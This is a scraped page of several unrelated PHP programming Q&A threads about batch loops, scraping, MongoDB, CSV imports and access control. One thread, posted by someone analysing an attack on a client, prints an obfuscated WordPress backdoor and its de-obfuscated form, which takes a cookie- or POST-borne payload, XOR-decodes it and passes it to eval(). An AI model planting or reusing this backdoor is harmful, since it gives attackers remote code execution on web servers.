I am having the foreach loop that will run minimum 2000 loops
foreach ($giftCardSchemeData as $keypreload => $preload) {
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$cardnumber = self::getCardNumber();
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card" ;
$giftCardSchemeDataDb = array('preload' => array('value' => $preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' => $cardexistencetype, 'isgiftcard' => true , 'giftcardamount' => $preload['value'],'giftCardSchemeData' => json_encode($giftCardSchemeDataDb), 'expirymonths' => $preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' => null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null, 'pinnumber' => mt_rand(100000,999999));
$output = array_merge($data, $otherdata);
// var_dump($output);
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Like above foreach I am having totally 5 of them. When I call the function each time the 5 foreach runs and then return the response. It take more time and the php maximum execution time occurs.
Is there a any way to send the response and then we could run the foreach in server side and not creating the maximum execution time issue.Also need an optimization for the foreach.
Also In symfony I have tried the try catch method for the existence check in the above code it return the Entity closed Error. I have teprorily used the existence check in Db but need an optimization
There seems to be a lot wrong (or to be optimized) with this code, but let's focus on your questions:
First I think this code shouldn't be in code that will be triggered by a visitor.
You should seperate 2 processes:
1. A cronjob that runs that will generate everything that must be generated and saved that generated info to a database. The cronjob can take as much time as it needs. Look at Symfony's console components
2. A page that displays only the generated info by fetching it from the database and passing it to a Twig template.
However, looking at the code you posted I think it can be greatly optimized as is. You seem to have a foreach loop that fetches variable data, and in that you have a for-loop that does not seem to generate much variability at all.
So most of the code inside the for loop is now being executed over and over again without making any actual changes.
Here is a concept that would give much higher performance. Ofcourse since I don't know the actual context of your code you will have to "fix it".
$carddetailsRepository = $this->get('oloy.carddetails.repository');
$cardexistencetype = ($key == "giftCardSchemeData") ? "Physical" : "E-Card";
foreach ($giftCardSchemeData as $keypreload => $preload) {
$cardnumber = self::getCardNumber();
$carddetails = $carddetailsRepository->findByCardnumber($cardnumber);
$giftCardSchemeDataDb = array('preload' => array('value' =>
$preload['value'], 'expirymonths' => $preload['expiryMonths']));
$otherdata = array('cardnumber' => $cardnumber, 'cardexistencetype' =>
$cardexistencetype, 'isgiftcard' => true , 'giftcardamount' =>
$preload['value'],'giftCardSchemeData' =>
json_encode($giftCardSchemeDataDb), 'expirymonths' =>
$preload['expiryMonths'], 'isloyaltycard' => false, 'loyaltypoints' =>
null,'loyaltyCardSchemeData' => null, 'loyaltyRedeemAmount' => null,
'pinnumber' => 0);
$output = array_merge($data, $otherdata);
for ($i=0; $i <$preload['quantity'] ; $i++) {
$cardid = new CarddetailsId($uuidGenerator->generate());
$output['pinnumber'] = mt_rand(100000,999999);
if (!$carddetails) {
$commandBus->dispatch(
new CreateCarddetails($cardid, $output)
);
} else {
self::generateCardFunctionForErrorException($cardid, $output, $commandBus);
}
}
}
Also: if in this code you are triggering any database inserts or updates, you don't want to trigger them each iteration. You will want to start some kind of database transaction and flush the queries each X iterations instead.
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
One of my clients using WordPress got hacked with some malicious code like below, There are lots of file like this in all over her public_html. Though I told her to delete everything and re-upload all and update framework, plugins etc but I also want to know how can I de-obfuscate the codes
Why? Because my VPS provider told me that some hacking attempt was done using my IP (main server) to some news channel and I should stop from this kind of activities or they will simply discontinue my VPS.
So could anyone guide me to know exact code so I can analyze what kind of harms it may done.
Please note I've done jail-shell, CSF, blocking IP still it finds some way.
<?php
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
#$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
#$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}
foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
{
$v40207 = Array(
$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => #$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
);
echo #$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
}
elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
{
eval($n1f035[$GLOBALS['efaa04'][40]]);
}
exit();
}
Tried to decode it with http://localhost/script.php?testGet=sss and got result
Array
(
[_GET] => Array
(
[testGet] => sss
)
[_POST] => Array
(
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[GLOBALS] => Array
*RECURSION*
[efaa04] => > ,Fg7R2}Sl{a)nhO?#P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
[m56df3a] => chr
[ue8410] => ord
[x6a870c8] => strlen
[rfa65] => ini_set
[ne6255ab9] => serialize
[y648d6] => phpversion
[h8f865758] => unserialize
[j51e1d] => base64_decode
[y8512e] => set_time_limit
[t4193646] => q471
[t297c] => n6ee1
[uaf6e192f] => Array
(
)
[mb1694f] => Array
(
)
[n1f035] =>
[la02268b] =>
[ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)
got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)
I've told my client them to delete all files and re-upload from the backup. As I said I've found so many C99madshell (raw), is this kind of same in obfuscating manner.
Please note I've found a way to protect by searching malicious code and deleting them. Then run a command like chattr -R +i ./public_html then it seems stopped though i'm sure there are many backdoor scripts still inside. but if I would know exact code of above would be better.
I agree with #Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot -from it.
I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.
First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.
Some lines like this revealed:
$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...
After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:
<?php
#ini_set("error_log", NULL);
#ini_set("log_errors", 0);
#ini_set("max_execution_time", 0);
#set_time_limit(0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207 < strlen($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}
foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($_POST as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = #unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
if ($n1f035["a"] == "i")
{
$v40207 = Array(
"pv" => #phpversion(),
"sv" => "1.0-1",
);
echo #serialize($v40207);
}
elseif ($n1f035["a"] == "e")
{
eval($n1f035["d"]);
}
exit();
}
De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.
Fixing you client's site and keeping it safe is your homework, but I look forward for a discussion around de-obfuscation and techniques to do so.
A tip: Use find . -type f -printf '%T# %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed in the same day, or close dates at least, so that help to clean up the mess if you can't just wipe things clean at the moment.
I am using "simple_html_dom.php" to scrap the data from the Wikipedia site. If I run the code in scraperwiki.com it's throwing an error as exit status 139 and if run the same code in my xampp sever, the server is hanging.
I have a set of links
I'm trying to get Literacy value from all the sites
If I run the code with one link there is no problem and it's returning the expected result
If I try to get data from all the sites in one go I'm facing the above problem
The code is:
<?php
$test=array
(
0 => "http://en.wikipedia.org/wiki/Andhra_Pradesh",
1 => "http://en.wikipedia.org/wiki/Arunachal_Pradesh",
2 => "http://en.wikipedia.org/wiki/Assam",
3 => "http://en.wikipedia.org/wiki/Bihar",
4 => "http://en.wikipedia.org/wiki/Chhattisgarh",
5 => "http://en.wikipedia.org/wiki/Goa",
for($ix=0;$ix<=9;$ix++){
$content = file_get_html($test[$ix]);
$tables = $content ->find('#mw-content-text table',0);
foreach ($tables ->children() as $child1) {
foreach($child1->find('th a') as $ele){
if($ele->innertext=="Literacy"){
foreach($child1->find('td') as $ele1){
echo $ele1->innertext;
}}} }}
Guide me where am wrong. Is there any memory problem??? Is there any xampp configuration???
<?php
require 'simple_html_dom.php';
$test = array(
0 => "http://en.wikipedia.org/wiki/Andhra_Pradesh",
1 => "http://en.wikipedia.org/wiki/Arunachal_Pradesh",
2 => "http://en.wikipedia.org/wiki/Assam",
3 => "http://en.wikipedia.org/wiki/Bihar",
4 => "http://en.wikipedia.org/wiki/Chhattisgarh",
5 => "http://en.wikipedia.org/wiki/Goa");
for($ix=0;$ix<=count($test);$ix++){
$content = file_get_html($test[$ix]);
$tables = $content ->find('#mw-content-text table',0);
foreach ($tables ->children() as $child1) {
foreach($child1->find('th a') as $ele){
if($ele->innertext=="Literacy"){
foreach($child1->find('td') as $ele1){
echo $ele1->innertext;
}
}
}
}
$content->clear();
}
?>
but these URLs are too much. You may get a fatal error of max execution time execeeded or you may get error 324.
So, I've been working on this code for some time, but I'm giving up, and reaching out for help from you guys. I've been looking at documentation for MongoDB and PHP, but I can't find anything. What I want to do is take the sample code for inserting a record:
$obj = array( "title" => "Calvin and Hobbes", "author" => "Bill Watterson" );
And re-purpose is for my project (as shown):
$obj = array( $startCol => $startRow );
The thing is that $startCol and $startRow are arrays, and it gives me a problem every time I want to run the document. Is there something ridiculously simple I'm missing here? Thanks in advance.
Chunk of code that's giving me problems:
$maxRows= count($currentarray); //Outputs 45
$maxCols= count($currentarray[0]); //Outputs 9
$currentRow=1;
$currentCol=1;
$testing = 1;
do {
while ($currentCol<$maxCols){
$startCol[] = $currentarray[0][$currentCol];
$startRow[] = $currentarray[$currentRow][$currentCol];
$currentCol++;
}
$obj = array( $startCol => $startRow );
$collection->insert($obj);
print_r ($collection);
if ($currentCol==$maxCols)
$currentCol=1;
$currentRow++;
$testing++;
//echo "<br />";
} while ($currentRow<$maxRows);
The problem I was getting was with my output statement. So my answer was fairly simple. After, print_r() all of my variables I found that I was in fact storing them, but I was calling them incorrectly at the end of the program.
I have a csv file that has roughly 100K entries I need to process and insert into a data base.
Previously it was very slow because it makes an SQL call for every entry. I do this though because if I try to build 1 single query to do this I will run out of memory.
I migrated to a new server and now I get an error every time I run it:
SQL Error : 2006 MySQL server has gone away
I am not sure but think this is just happening because how inefficient my code is.
What can I do to make it perform better and not get the error?
Here is the code:
//empty table before saving new feed
$model->query('TRUNCATE TABLE diamonds');
$fp = fopen($this->file,'r');
while (!feof($fp))
{
$diamond = fgetcsv($fp);
//skip the first line
if(!empty($firstline))
{
$firstline = true;
continue;
}
if(empty($diamond[17]))
{
//no price -- skip it
continue;
}
$data = array(
'seller' => $diamond[0],
'rapnet_seller_code' => $diamond[1],
'shape' => $diamond[2],
'carat' => $diamond[3],
'color' => $diamond[4],
'fancy_color' => $diamond[5],
'fancy_intensity' => $diamond[6],
'clarity' => empty($diamond[8]) ? 'I1' : $diamond[8],
'cut' => empty($diamond[9]) ? 'Fair' : $diamond[9],
'stock_num' => $diamond[16],
'rapnet_price' => $diamond[17],
'rapnet_discount' => empty($diamond[18]) ? 0 : $diamond[18],
'cert' => $diamond[14],
'city' => $diamond[26],
'state' => $diamond[27],
'cert_image' => $diamond[30],
'rapnet_lot' => $diamond[31]
);
$measurements = $diamond[13];
$measurements = strtolower($measurements);
$measurements = str_replace('x','-',$measurements);
$mm = explode('-',$measurements);
$data['mm_width'] = empty($mm[0]) ? 0 : $mm[0];
$data['mm_length'] = empty($mm[1]) ? 0 : $mm[1];
$data['mm_depth'] = empty($mm[2]) ? 0 : $mm[2];
//create a new entry and save the data to it.
$model->create();
$model->save($data);
}
fclose($fp);
You're probably exceeding MySQL's max_allowed_packet setting, which sets a hard limit (in bytes) on how long a query string can be. There's nothing wrong with doing multi-value inserts, but 100k of them is definitely pushing things.
Instead of doing all 100k at once, try doing 1000 in a loop. You're still reducing total query count (down from 100k to just 1000), so it's still a net gain.
I am developing an access control library for my project and I am looking to the best solution to do this:
I am getting all my access list from database to an array. In result it looks like this:
$array = array(
'*' => array('administrator' => TRUE),
'frontend/*' => array(
'user' => TRUE,
'unregistered' => TRUE
),
'backend/*' => array(
'user' => FALSE,
'unregistered' => FALSE
),
'backend/user/*' => array(
'moderator' => FALSE,
'supermoderator' => TRUE,
),
'backend/article/*' => array(
'supermoderator' => TRUE
),
'backend/article/add/new' => array(
'moderator' => TRUE
)
);
The " * " means this user has access all of that related options backend/article/* means that group have access to all article options (article/add, article/remove, ...).
As you see the there is no item in backend/article/add for supermoderator but it has the master access to all article pages.
What is the best way to check this? I tried array_walk() but I guess it wont help me.
Thank you for advices...
I can share my whole code if you want.
* Edit *
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
Thank you for any advices
No matter what this is going to be a complex algorithm, a simple array_walk wont do. Unless someone is feeling particularly generous and will write one for you, I suggest you hire a programmer.
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
